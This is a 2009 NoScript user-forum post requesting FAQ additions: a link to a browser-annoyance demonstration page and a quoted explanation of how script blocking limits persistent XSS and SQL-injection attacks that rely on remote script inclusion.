FAQ addition request

Bug reports and enhancement requests
Post Reply
Aspirant
Junior Member
Posts: 27
Joined: Mon Sep 28, 2009 12:21 am

FAQ addition request

Post by Aspirant » Sat Dec 19, 2009 4:55 pm

The FAQ at http://noscript.net/faq#qa1_10 is very helpful for many people to understand why NoScript is necessary. Some people, however, would not be convinced by this info because they don't understand computer technology or they believe the probability of problems is small. For such people, a demonstration is helpful. I suggest adding to this FAQ a link to http://evil.hackademix.net/annoy/ along with instructions on how to terminate the browser in Windows Task Manager.

From viewtopic.php?f=8&t=2768&start=15#p11809
Giorgio Maone wrote:Script blocking (which you turn off) prevents 3rd party scripts from being included in your whitelisted site if their origins are not whitelisted as well.
This has nothing to do with Anti-XSS, but helps in most persistent XSS / SQL Injection scenarios, because using a remote inclusion is much more practical, and often the only feasible path for an attacker (e.g. if the injectable field has length constraints, see http://ha.ckers.org/blog/20080110/dimin ... st-wrapup/ ).

I suggest adding this info to the FAQ so users understand how NoScript protects them if their financial website gets hacked, and also so users understand the dangers of allowing all scripts on a page.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6

Post Reply